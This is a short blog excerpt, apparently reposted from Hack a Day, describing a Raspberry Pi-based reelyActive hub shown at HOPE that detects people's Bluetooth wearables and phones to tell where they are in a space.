The ability to set up a hub and detect Bluetooth devices solves the problem Bluetooth beacons solves — identifying when people enter a space, leave a space, and with a little bit of logic where people are located in a space — simply by using what they’re already wearing. Judging from what [Jeff] showed with his portable reelyActive hub (a Pi and a battery pack) a lot of people at HOPE are wearing Fitbits, wireless headphones, and leaving the Bluetooth on the phone on all the time. That’s a great way to tell where people are, providing a bridge between the physical world and the digital.

from Hack a Day http://ift.tt/2ad2aui

Older Posts »

Create a free website or blog at WordPress.com.